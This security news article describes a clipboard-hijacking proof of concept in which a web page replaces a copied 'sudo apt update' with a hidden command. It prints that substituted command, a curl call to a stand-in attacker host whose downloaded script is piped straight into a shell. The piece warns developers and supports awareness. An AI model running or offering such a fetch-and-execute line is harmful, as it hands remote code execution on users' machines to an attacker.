Programmers, system administrators, security researchers, and tech enthusiasts who copy and paste web page commands into a console or terminal are warned that their system could be compromised.
A technologist shows a simple trick that will make you think twice before copying and pasting text from web pages.
Backdoor on your clipboard?
Recently, Gabriel Friedlander, founder of the security awareness training platform Wizer, demonstrated an obvious but surprising hack that will prevent you from copying and pasting commands from web pages.
It is not uncommon for new and experienced developers to copy commonly used commands from a web page (ahem, StackOverflow) and paste them into their applications, a Windows command prompt, or a Linux terminal.
But Friedlander warns that a webpage could secretly replace the contents of what’s on your clipboard, and what ends up copying to your clipboard would be very different from what you intended to copy.
Worse yet, without the necessary due diligence, the developer may only realize their mistake after pasting the text, in which case it may be too late.
In a simple proof of concept (PoC) posted to his blog, Friedlander asks readers to copy a simple command that most system administrators and developers are familiar with:
Now paste what you copied from Friedlander’s blog into a text box or notepad, and the result might surprise you:
curl http: // attacker-domain: 8000 / shell.sh | sh
Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end.
This means that the example above would run as soon as it was pasted directly into a Linux terminal.
Those pasting the text might have felt like they were copying the familiar and harmless command sudo apt update which is used to retrieve updated information about the software installed on your system.
But that’s not quite what happened.
What is causing this?
As soon as you copy the “sudo apt update ” text contained in an HTML element, the code snippet, shown below, executes.
“That’s why you should NEVER copy paste commands directly into your terminal,” Friedlander warns.
“You think you’re copying something, but it’s replaced with something else, like malicious code. It only takes a single line of code injected into the code you copied to create a backdoor to your application. “
“This attack is very simple but also very harmful.”
A simple but nonetheless important lesson in everyday safety.